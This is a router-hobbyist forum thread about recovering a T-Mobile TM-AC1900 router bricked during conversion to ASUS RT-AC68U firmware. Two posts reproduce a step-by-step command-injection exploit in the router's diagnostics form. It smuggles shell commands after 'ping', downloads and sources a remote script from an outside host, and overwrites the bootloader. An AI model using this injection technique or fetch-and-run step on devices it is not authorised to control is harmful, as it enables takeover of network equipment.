Bricked TM AC-1900 Conversion

Post new topic   Reply to topic    DD-WRT Forum Index -> Broadcom SoC based Hardware
Author Message
bumrush23
DD-WRT Novice


Joined: 27 Jun 2019
Posts: 6

PostPosted: Thu Jun 27, 2019 3:25    Post subject: Bricked TM AC-1900 Conversion Reply with quote
I joined up here hoping for some possible help with my bricked router. This may be a long post, I'll apologize in advance. I have one of the T-Mobile CellSpot AC-1900's that are popularly converted to working RT AC68U's, and I had been running that firmware for a long time. I processed a firmware update one day, and it reverted me to a CellSpot firmware. At the time, I didn't feel like fooling with it, as I saw many others were going through the same issue. I waited until yesterday to follow up with attempting to convert my firmware back.

I discovered the USB method shown here, and followed every step successfully. I was back on RT AC68U firmware. I even followed the steps to fix the MTD5 partition here.

My problem begins when I saw the note at the end that I was now ready to flash a DD-WRT firmware if I'd like. I thought it may be another good step to avoid reverting back to CellSpot firmware, and everything I read online said it would be a simple firmware update via the GUI. I downloaded the most recent RT AC68U DD-WRT beta firmware, and submitted it through the GUI. I received the "success!" message, and it asked for a manual boot. I booted the router, and wasn't able to access it, so I did an NVRAM reset. I still wasn't able to access it, and I noticed that it would attempt to boot, but then turn off and attempt to boot again.

I decided to try putting it in recovery mode, which worked fine. I can get in recovery mode, and it is stable. However, I have to configure my IP to coincide with a 192.168.29.1 gateway, which makes me think somehow I'm still running a CellSpot firmware. Any firmware I attempt to flash returns the "The file transferred is not a valid firmware image." error message.

Does anyone here know how else I could connect to this router? Or possibly a different firmware file I should attempt uploading?

Thanks for any help![/url]
Sponsor
leadboots5
DD-WRT User


Joined: 05 Feb 2010
Posts: 83

PostPosted: Thu Jun 27, 2019 16:50    Post subject: Reply with quote
I think in recovery the image size needs to be under a certain size? Maybe the image you're flashing is too large.
_________________
Linksys E3000
ASUS RT-AC68U
bumrush23
DD-WRT Novice


Joined: 27 Jun 2019
Posts: 6

PostPosted: Thu Jun 27, 2019 23:21    Post subject: Reply with quote
I heard that somewhere before as well. I’ve tried flashing firmware as small as 25mb with no success. From reading other forum posts, I will probably have success with a copy of the TM AC 1900 376.3199 firmware, but I’m unable to find that firmware anywhere. Does anyone know where I could find that file?

Thanks!
bumrush23
DD-WRT Novice


Joined: 27 Jun 2019
Posts: 6

PostPosted: Fri Jun 28, 2019 12:30    Post subject: Reply with quote
I'm going to look through every page of that linked thread to see if I can find a working firmware. If you happen to come across one, please post it! I'm just trying to get this thing to boot at this point.

Thanks!
bumrush23
DD-WRT Novice


Joined: 27 Jun 2019
Posts: 6

PostPosted: Fri Jun 28, 2019 15:28    Post subject: Reply with quote
No luck. There were a few people who commented about rolling back to this 3199 firmware in order to return theirs, but no one actually did it. I haven't been able to find any official TMo trx firmware files. I have ordered another router that I found a good deal on from eBay. Not sure what firmware it will be running, but would it be possible to pull a copy of the firmware from that router somehow? If anyone finds a copy of the 3199 firmware, please point me in that direction!

Thanks for your help.
kernel-panic69
DD-WRT Guru


Joined: 08 May 2018
Posts: 12969
Location: Texas, USA

PostPosted: Fri Jun 28, 2019 16:30    Post subject: Reply with quote
Ok, so are you wanting to get it back to DD-WRT or OEM firmware? Or re-convert it?

https://lazymocha.com/blog/2018/04/16/flash-t-mobile-cellspot-tm-ac1900-to-asus-rt-ac68u-p/

I couldn't find the 3199 firmware file anywhere, but if you are looking to re-convert, it's not suitable for that, as best I can tell from all the information I found.
bumrush23
DD-WRT Novice


Joined: 27 Jun 2019
Posts: 6

PostPosted: Fri Jun 28, 2019 17:53    Post subject: Reply with quote
kernel-panic69 wrote:
Ok, so are you wanting to get it back to DD-WRT or OEM firmware? Or re-convert it?

https://lazymocha.com/blog/2018/04/16/flash-t-mobile-cellspot-tm-ac1900-to-asus-rt-ac68u-p/

I couldn't find the 3199 firmware file anywhere, but if you are looking to re-convert, it's not suitable for that, as best I can tell from all the information I found.


I just want it to boot to something. If I'm not in recovery mode it just boot loops, so it looks like my only option right now is to find a firmware file the CFE miniWeb accepts as valid. I've tried uploading the 376.1703 firmware listed at lazymocha, but it returns an invalid firmware error through mine. I'm thinking the only firmware it will accept is 376.3199, but I can't find that file anywhere.
bumrush23
DD-WRT Novice


Joined: 27 Jun 2019
Posts: 6

PostPosted: Tue Jul 02, 2019 2:59    Post subject: Reply with quote
OK, I have the new router, but I'm having a hard time figuring out what command to issue in order to extract the trx file using the USB method from the Google Doc. Does anyone know how I could copy /dev/mtd2 to a trx file on my mounted USB stick?
blueman2
DD-WRT User


Joined: 24 Nov 2008
Posts: 62

PostPosted: Mon Aug 19, 2019 20:36    Post subject: The file transferred is not a valid firmware image Reply with quote
I finally found a work around for the "The file transferred is not a valid firmware image." when trying to upload firmware version is 3.0.0.4.376_3199-ge62f8ab to convert T-mobile 1900 to AC-68U. The latest firmware is blocking downgrade to this firmware, but there is another exploit to get the job done.

https://docs.google.com/document/d/1NsZMONmJ70zMmoAKKQJXbTVKytaPJptWTpqih1TD5n8/edit?usp=sharing

This worked perfectly for me.

Quote:
The router must be connected to the internet for this to work. If you do not wish to connect your router to the internet, you will need to install the u.txt script on a local web server instead, in which case you might as well use the web server instructions.

STEP 1: You need a USB stick
Set the disk label for the USB to be “USB”.

STEP 2: Create a zip file containing the necessary files
Two of the three files you need can be obtained from the Lazymocha Guide or the Bay Area Tech Pros Guide.

mtd-write
FW_RT_AC68U_30043763626.trx

The third file is created at step 15 of the guide at https://www.bayareatechpros.com/ac1900-to-ac68u/

new_cfe.bin

If unable to create new_cfe.bin as detailed in the guide or your router already had the locked firmware when you bought it, use NO CFE USB Instructions or the more complicated instructions in Appendix 6.
Add the three files into a zip archive, and call it something simple - like “files12345.zip”

Step 3: The exploit explained and test command
The basic premise is when you go to your router's Network Analysis page (log in to your router, Network Tools menu on the left) there is an drop down to select one of three commands (Ping, Traceroute, Nslookup). Rather than passing in the values you pick, Asus instead wrote the interface to pass in the shell command to run.

The exploit lies in the fact that you can simply pass in every shell command you wanted to run by entering strings in the Console section in your browser (in other words, open the Network Analysis page of your router in Google Chrome, right click anywhere in the page and select "inspect", and then click in the Console section.
To test if it works, enter the following string in the console and hit enter.

validForm = function(){document.form.SystemCmd.value = "ping\necho hello world";return true;}

Now press the Diagnose button, and you should see the output from the command "hello world".

The restrictions they put in place though is you must have one of the commands at the start of the string (such as ping), and you cannot use special characters such as /. That makes it tricky to use the exploit but not impossible.

Step 4: Install the USB
Insert your USB stick into the router and check that it is loaded as “USB”.

Step 5: Run commands to download the script to your router
Your router MSUT be connected to the internet VIA THE WAN PORT for this step!!!!!!

Most of these commands are just to change the /www folder from read only to read write. Until you do that a wget command will fail. If you do not see the directories getting mounted correctly with tmpfs, you may have to repeat the mount commands.

Go back to the Network Analysis page of your router and paste each of the following commands in the Console section:

validForm = function(){document.form.SystemCmd.value = "ping\nmount -t tmpfs tmpfs userRpm";return true;}

Press enter, then click Diagnose button.

validForm = function(){document.form.SystemCmd.value = "ping\nmount";return true;}

Press enter, then click Diagnose button.

validForm = function(){document.form.SystemCmd.value = "ping\ncp -a . userRpm";return true;}

Press enter, then click Diagnose button. If you see the message cp: recursion detected, omitting directory "./userRpm" you are on the right track.

validForm = function(){document.form.SystemCmd.value = "ping\nmount --move userRpm .";return true;}

Press enter, then click Diagnose button.

validForm = function(){document.form.SystemCmd.value = "ping\nmount";return true;}

Press enter, then click Diagnose button.

validForm = function(){document.form.SystemCmd.value = "ping\nservice restart_httpd";return true;}

Press enter, then click Diagnose button. You may need to wait up to two minutes before the next command will work.

validForm = function(){document.form.SystemCmd.value = "ping\nwget -A txt -r -nH -nd docbill.freeshell.org";return true;}

Press enter, then click Diagnose button. If the wget command fails retry the restart_httpd command and then this one. The index.html file downloaded will be automatically deleted, but you should see a u.txt file downloaded and not deleted.

validForm = function(){document.form.SystemCmd.value = "ping\n. u.txt " + encodeURIComponent("find /tmp/mnt -name files12345.zip").replace(/%/g,"..");return true;}

Press enter, then click Diagnose button. This should tell you where the file is mounted. The name is probably "/tmp/mnt/USB/files12345.zip".

validForm = function(){document.form.SystemCmd.value = "ping\n. u.txt " + encodeURIComponent("unzip -o /tmp/mnt/USB/files12345.zip").replace(/%/g,"..");return true;}

Press enter, then click Diagnose button. If your disk is mounted by a name other than /tmp/mnt/USB, change the command appropriately.

validForm = function(){document.form.SystemCmd.value = "ping\nchmod 755 mtd-write";return true;}

Press enter, then click Diagnose button.

validForm = function(){document.form.SystemCmd.value = "ping\n. u.txt " + encodeURIComponent("./mtd-write new_cfe.bin boot").replace(/%/g,"..");return true;}

Press enter, then click Diagnose button.

validForm = function(){document.form.SystemCmd.value = "ping\nmtd-write2 FW_RT_AC68U_30043763626.trx linux";return true;}

Press enter, then click Diagnose button. If this command fails, you can still use the miniCFE at this point as a result of the previous command.
Wait a few minutes, and reset NVRAM (turn off router, press and hold WPS button and turn on router while holding the WPS button for another 20 seconds. Once the white LED at the back starts flashing, release the WPS button and wait a few minutes for the router to reboot.
The new IP address of the router will be 192.168.1.1 revealing it is now an ASUS device (192.168.29.1 is the T Mobile IP address).
pr0lab
DD-WRT Novice


Joined: 22 Dec 2021
Posts: 2

PostPosted: Wed Dec 22, 2021 19:45    Post subject: Re: The file transferred is not a valid firmware image Reply with quote
I've ran into the same issue here where I cannot load the firmware file because it's either non-compatible or non supported. Just like what you have described.

I have a question about the below process before starting, it says that the model MUST be connected to the internet but since it's bricked and restore mode will only offer me the CME option which won't let me upload anything, I was wondering how did you connect it to the internet?

blueman2 wrote:
I finally found a work around for the "The file transferred is not a valid firmware image." when trying to upload firmware version is 3.0.0.4.376_3199-ge62f8ab to convert T-mobile 1900 to AC-68U. The latest firmware is blocking downgrade to this firmware, but there is another exploit to get the job done.

https://docs.google.com/document/d/1NsZMONmJ70zMmoAKKQJXbTVKytaPJptWTpqih1TD5n8/edit?usp=sharing

This worked perfectly for me.

Quote:
The router must be connected to the internet for this to work. If you do not wish to connect your router to the internet, you will need to install the u.txt script on a local web server instead, in which case you might as well use the web server instructions.

STEP 1: You need a USB stick
Set the disk label for the USB to be “USB”.

STEP 2: Create a zip file containing the necessary files
Two of the three files you need can be obtained from the Lazymocha Guide or the Bay Area Tech Pros Guide.

mtd-write
FW_RT_AC68U_30043763626.trx

The third file is created at step 15 of the guide at https://www.bayareatechpros.com/ac1900-to-ac68u/

new_cfe.bin

If unable to create new_cfe.bin as detailed in the guide or your router already had the locked firmware when you bought it, use NO CFE USB Instructions or the more complicated instructions in Appendix 6.
Add the three files into a zip archive, and call it something simple - like “files12345.zip”

Step 3: The exploit explained and test command
The basic premise is when you go to your router's Network Analysis page (log in to your router, Network Tools menu on the left) there is an drop down to select one of three commands (Ping, Traceroute, Nslookup). Rather than passing in the values you pick, Asus instead wrote the interface to pass in the shell command to run.

The exploit lies in the fact that you can simply pass in every shell command you wanted to run by entering strings in the Console section in your browser (in other words, open the Network Analysis page of your router in Google Chrome, right click anywhere in the page and select "inspect", and then click in the Console section.
To test if it works, enter the following string in the console and hit enter.

validForm = function(){document.form.SystemCmd.value = "ping\necho hello world";return true;}

Now press the Diagnose button, and you should see the output from the command "hello world".

The restrictions they put in place though is you must have one of the commands at the start of the string (such as ping), and you cannot use special characters such as /. That makes it tricky to use the exploit but not impossible.

Step 4: Install the USB
Insert your USB stick into the router and check that it is loaded as “USB”.

Step 5: Run commands to download the script to your router
Your router MSUT be connected to the internet VIA THE WAN PORT for this step!!!!!!

Most of these commands are just to change the /www folder from read only to read write. Until you do that a wget command will fail. If you do not see the directories getting mounted correctly with tmpfs, you may have to repeat the mount commands.

Go back to the Network Analysis page of your router and paste each of the following commands in the Console section:

validForm = function(){document.form.SystemCmd.value = "ping\nmount -t tmpfs tmpfs userRpm";return true;}

Press enter, then click Diagnose button.

validForm = function(){document.form.SystemCmd.value = "ping\nmount";return true;}

Press enter, then click Diagnose button.

validForm = function(){document.form.SystemCmd.value = "ping\ncp -a . userRpm";return true;}

Press enter, then click Diagnose button. If you see the message cp: recursion detected, omitting directory "./userRpm" you are on the right track.

validForm = function(){document.form.SystemCmd.value = "ping\nmount --move userRpm .";return true;}

Press enter, then click Diagnose button.

validForm = function(){document.form.SystemCmd.value = "ping\nmount";return true;}

Press enter, then click Diagnose button.

validForm = function(){document.form.SystemCmd.value = "ping\nservice restart_httpd";return true;}

Press enter, then click Diagnose button. You may need to wait up to two minutes before the next command will work.

validForm = function(){document.form.SystemCmd.value = "ping\nwget -A txt -r -nH -nd docbill.freeshell.org";return true;}

Press enter, then click Diagnose button. If the wget command fails retry the restart_httpd command and then this one. The index.html file downloaded will be automatically deleted, but you should see a u.txt file downloaded and not deleted.

validForm = function(){document.form.SystemCmd.value = "ping\n. u.txt " + encodeURIComponent("find /tmp/mnt -name files12345.zip").replace(/%/g,"..");return true;}

Press enter, then click Diagnose button. This should tell you where the file is mounted. The name is probably "/tmp/mnt/USB/files12345.zip".

validForm = function(){document.form.SystemCmd.value = "ping\n. u.txt " + encodeURIComponent("unzip -o /tmp/mnt/USB/files12345.zip").replace(/%/g,"..");return true;}

Press enter, then click Diagnose button. If your disk is mounted by a name other than /tmp/mnt/USB, change the command appropriately.

validForm = function(){document.form.SystemCmd.value = "ping\nchmod 755 mtd-write";return true;}

Press enter, then click Diagnose button.

validForm = function(){document.form.SystemCmd.value = "ping\n. u.txt " + encodeURIComponent("./mtd-write new_cfe.bin boot").replace(/%/g,"..");return true;}

Press enter, then click Diagnose button.

validForm = function(){document.form.SystemCmd.value = "ping\nmtd-write2 FW_RT_AC68U_30043763626.trx linux";return true;}

Press enter, then click Diagnose button. If this command fails, you can still use the miniCFE at this point as a result of the previous command.
Wait a few minutes, and reset NVRAM (turn off router, press and hold WPS button and turn on router while holding the WPS button for another 20 seconds. Once the white LED at the back starts flashing, release the WPS button and wait a few minutes for the router to reboot.
The new IP address of the router will be 192.168.1.1 revealing it is now an ASUS device (192.168.29.1 is the T Mobile IP address).
Display posts from previous:    Page 1 of 1
Post new topic   Reply to topic    DD-WRT Forum Index -> Broadcom SoC based Hardware All times are GMT

Navigation

 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum